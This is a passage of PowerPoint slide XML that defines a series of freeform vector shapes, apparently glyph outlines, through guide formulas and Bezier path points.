                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927C04B2-6ED1-4AA9-A64F-8516AE63ED45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4144963" y="4330700"/>
              <a:ext cx="96838" cy="1317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199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3 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 19 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 63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3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199" y="92"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="62"/>
                    <a:pt x="187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1"/>
                    <a:pt x="63" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63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19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3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2" name="Freeform 918">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709BC5E9-8BC2-4A99-B470-EA3A687855FC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4395788" y="4357688"/>
              <a:ext cx="87313" cy="104775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3" name="Freeform 919">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B3633C-D76A-497F-BF1E-57AC227F4D5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId205"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4516438" y="4318000"/>
              <a:ext cx="85725" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 187"/>
                <a:gd name="T1" fmla="*/ 111 h 306"/>
                <a:gd name="T2" fmla="*/ 95 w 187"/>
                <a:gd name="T3" fmla="*/ 91 h 306"/>
                <a:gd name="T4" fmla="*/ 24 w 187"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 187"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 24 w 187"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 80 w 187"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 80 w 187"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 20 w 187"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 187"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 20 w 187"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 167 w 187"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 187 w 187"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 167 w 187"/>
                <a:gd name="T25" fmla="*/ 275 h 306"/>
                <a:gd name="T26" fmla="*/ 115 w 187"/>
                <a:gd name="T27" fmla="*/ 275 h 306"/>
                <a:gd name="T28" fmla="*/ 115 w 187"/>
                <a:gd name="T29" fmla="*/ 111 h 306"/>
                <a:gd name="T30" fmla="*/ 115 w 187"/>
                <a:gd name="T31" fmla="*/ 25 h 306"/>
                <a:gd name="T32" fmla="*/ 90 w 187"/>
                <a:gd name="T33" fmla="*/ 0 h 306"/>
                <a:gd name="T34" fmla="*/ 65 w 187"/>
                <a:gd name="T35" fmla="*/ 25 h 306"/>
                <a:gd name="T36" fmla="*/ 90 w 187"/>
                <a:gd name="T37" fmla="*/ 50 h 306"/>
                <a:gd name="T38" fmla="*/ 115 w 187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306">
                  <a:moveTo>
                    <a:pt x="115" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="96"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="16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2" y="306"/>
                    <a:pt x="20" y="306"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="306"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="306"/>
                    <a:pt x="187" y="306"/>
                    <a:pt x="187" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187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4" name="Freeform 920">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B76A01-6DF5-4E40-9085-5FAFBB6EE2A1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4625975" y="4359275"/>
              <a:ext cx="101600" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 220"/>
                <a:gd name="T1" fmla="*/ 37 h 215"/>
                <a:gd name="T2" fmla="*/ 218 w 220"/>
                <a:gd name="T3" fmla="*/ 17 h 215"/>
                <a:gd name="T4" fmla="*/ 198 w 220"/>
                <a:gd name="T5" fmla="*/ 0 h 215"/>
                <a:gd name="T6" fmla="*/ 28 w 220"/>
                <a:gd name="T7" fmla="*/ 0 h 215"/>
                <a:gd name="T8" fmla="*/ 8 w 220"/>
                <a:gd name="T9" fmla="*/ 20 h 215"/>
                <a:gd name="T10" fmla="*/ 8 w 220"/>
                <a:gd name="T11" fmla="*/ 43 h 215"/>
                <a:gd name="T12" fmla="*/ 25 w 220"/>
                <a:gd name="T13" fmla="*/ 63 h 215"/>
                <a:gd name="T14" fmla="*/ 42 w 220"/>
                <a:gd name="T15" fmla="*/ 43 h 215"/>
                <a:gd name="T16" fmla="*/ 42 w 220"/>
                <a:gd name="T17" fmla="*/ 30 h 215"/>
                <a:gd name="T18" fmla="*/ 166 w 220"/>
                <a:gd name="T19" fmla="*/ 30 h 215"/>
                <a:gd name="T20" fmla="*/ 11 w 220"/>
                <a:gd name="T21" fmla="*/ 178 h 215"/>
                <a:gd name="T22" fmla="*/ 0 w 220"/>
                <a:gd name="T23" fmla="*/ 198 h 215"/>
                <a:gd name="T24" fmla="*/ 20 w 220"/>
                <a:gd name="T25" fmla="*/ 215 h 215"/>
                <a:gd name="T26" fmla="*/ 209 w 220"/>
                <a:gd name="T27" fmla="*/ 215 h 215"/>
                <a:gd name="T28" fmla="*/ 220 w 220"/>
                <a:gd name="T29" fmla="*/ 194 h 215"/>
                <a:gd name="T30" fmla="*/ 220 w 220"/>
                <a:gd name="T31" fmla="*/ 165 h 215"/>
                <a:gd name="T32" fmla="*/ 203 w 220"/>
                <a:gd name="T33" fmla="*/ 145 h 215"/>
                <a:gd name="T34" fmla="*/ 186 w 220"/>
                <a:gd name="T35" fmla="*/ 165 h 215"/>
                <a:gd name="T36" fmla="*/ 186 w 220"/>
                <a:gd name="T37" fmla="*/ 184 h 215"/>
                <a:gd name="T38" fmla="*/ 51 w 220"/>
                <a:gd name="T39" fmla="*/ 184 h 215"/>
                <a:gd name="T40" fmla="*/ 207 w 220"/>
                <a:gd name="T41" fmla="*/ 3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5">
                  <a:moveTo>
                    <a:pt x="207" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="27"/>
                    <a:pt x="218" y="25"/>
                    <a:pt x="218" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="0"/>
                    <a:pt x="207" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="8" y="4"/>
                    <a:pt x="8" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="43"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="52"/>
                    <a:pt x="8" y="63"/>
                    <a:pt x="25" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="63"/>
                    <a:pt x="42" y="53"/>
                    <a:pt x="42" y="43"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="178"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="189"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="215"/>
                    <a:pt x="11" y="215"/>
                    <a:pt x="20" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="209" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="212"/>
                    <a:pt x="220" y="202"/>
                    <a:pt x="220" y="194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="156"/>
                    <a:pt x="220" y="145"/>
                    <a:pt x="203" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="145"/>
                    <a:pt x="186" y="155"/>
                    <a:pt x="186" y="165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="186" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207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5" name="Freeform 921">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A784AE11-4393-4F5B-8956-19AA619A612C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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4751388" y="4357688"/>
              <a:ext cx="93663" cy="104775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6" name="Freeform 922">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D321E9F-06C6-427A-A18B-59DB33B598C1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4900613" y="4430713"/>
              <a:ext cx="38100" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 41 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 63 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17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51" y="61"/>
                  </a:move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7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  <a:cubicBezTo>
                    <a:pt x="83" y="20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3"/>
                    <a:pt x="41" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="63"/>
                    <a:pt x="47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7" name="Freeform 923">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31307390-19A2-4E8F-B8BF-E56A2F812371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5116513" y="4357688"/>
              <a:ext cx="90488" cy="104775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8" name="Freeform 924">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0887FE-76EA-417F-924C-3D348C54715E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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5232400" y="4357688"/>
              <a:ext cx="95250" cy="104775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5 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 205"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108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5" y="155"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35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8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9" name="Freeform 925">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F63DA6-2CB6-4389-B6B0-1A5AEEE84438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5341938" y="4359275"/>
              <a:ext cx="115888" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 187 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 71 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250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  <a:cubicBezTo>
                    <a:pt x="250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0" name="Freeform 926">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619049C4-EE6D-40B1-B622-3EF934C367EF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5476875" y="4357688"/>
              <a:ext cx="88900" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 223"/>
                <a:gd name="T2" fmla="*/ 78 w 193"/>
                <a:gd name="T3" fmla="*/ 86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8 h 223"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75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2 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 98 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 17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2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2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="78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8" y="95"/>
                    <a:pt x="112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1" name="Freeform 927">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA443104-B113-4108-AD0F-DE12D2C66C6A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5586413" y="4330700"/>
              <a:ext cx="96838" cy="1317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4 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64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2" name="Freeform 928">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C899A58A-7D74-4654-85D2-BA78F45F1CAB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5837238" y="4357688"/>
              <a:ext cx="90488" cy="104775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3" name="Freeform 929">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2828A2FB-FEE6-4117-8B36-B52BD65A4158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5943600" y="4318000"/>
              <a:ext cx="114300" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 249"/>
                <a:gd name="T1" fmla="*/ 158 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 249"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 249"/>
                <a:gd name="T5" fmla="*/ 113 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 249"/>
                <a:gd name="T7" fmla="*/ 20 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 249"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 20 w 249"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 249"/>
                <a:gd name="T13" fmla="*/ 15 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 30 h 305"/>
                <a:gd name="T16" fmla="*/ 42 w 249"/>
                <a:gd name="T17" fmla="*/ 30 h 305"/>
                <a:gd name="T18" fmla="*/ 42 w 249"/>
                <a:gd name="T19" fmla="*/ 274 h 305"/>
                <a:gd name="T20" fmla="*/ 20 w 249"/>
                <a:gd name="T21" fmla="*/ 274 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 249"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 249"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 99 w 249"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 249"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 99 w 249"/>
                <a:gd name="T31" fmla="*/ 274 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 249"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 249"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 249"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 172 w 249"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 172 w 249"/>
                <a:gd name="T41" fmla="*/ 274 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 249"/>
                <a:gd name="T43" fmla="*/ 274 h 305"/>
                <a:gd name="T44" fmla="*/ 132 w 249"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 249"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 229 w 249"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 249 w 249"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 249"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 249"/>
                <a:gd name="T55" fmla="*/ 274 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 249"/>
                <a:gd name="T57" fmla="*/ 15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07" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="181" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="87"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="77" y="113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4"/>
                    <a:pt x="107" y="274"/>
                    <a:pt x="99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5" y="117"/>
                    <a:pt x="172" y="131"/>
                    <a:pt x="172" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="132" y="274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  <a:cubicBezTo>
                    <a:pt x="249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4" name="Freeform 930">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8DA6A2D-38F1-41E4-8148-5778964FF048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6073775" y="4357688"/>
              <a:ext cx="107950" cy="10477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7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59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1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4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59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59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5" name="Freeform 931">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA42DF5-1B34-41B5-99B0-2E982C34332B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6188075" y="4359275"/>
              <a:ext cx="104775" cy="101600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6" name="Freeform 932">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4784BE6E-47DE-4C2D-9C31-5BAFE7831A41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6437313" y="4338638"/>
              <a:ext cx="88900" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 133 h 215"/>
                <a:gd name="T2" fmla="*/ 159 w 193"/>
                <a:gd name="T3" fmla="*/ 161 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 193"/>
                <a:gd name="T5" fmla="*/ 169 h 215"/>
                <a:gd name="T6" fmla="*/ 193 w 193"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 186 w 193"/>
                <a:gd name="T9" fmla="*/ 139 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 193"/>
                <a:gd name="T11" fmla="*/ 107 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 193"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 174 w 193"/>
                <a:gd name="T17" fmla="*/ 45 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 193"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 193"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 193"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 193"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 193"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 193"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 16 w 193"/>
                <a:gd name="T31" fmla="*/ 45 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 193"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 193"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 66 w 193"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 12 w 193"/>
                <a:gd name="T39" fmla="*/ 136 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 193"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 193"/>
                <a:gd name="T43" fmla="*/ 169 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 193"/>
                <a:gd name="T45" fmla="*/ 133 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 193"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 193"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 193"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 193"/>
                <a:gd name="T53" fmla="*/ 13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12" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="150"/>
                    <a:pt x="124" y="140"/>
                    <a:pt x="159" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="169"/>
                    <a:pt x="173" y="169"/>
                    <a:pt x="177" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="193" y="160"/>
                    <a:pt x="193" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="144"/>
                    <a:pt x="187" y="140"/>
                    <a:pt x="186" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="131"/>
                    <a:pt x="140" y="114"/>
                    <a:pt x="127" y="107"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="181" y="78"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="75"/>
                    <a:pt x="193" y="71"/>
                    <a:pt x="193" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="60"/>
                    <a:pt x="193" y="45"/>
                    <a:pt x="174" y="45"/>
                  </a:cubicBezTo>
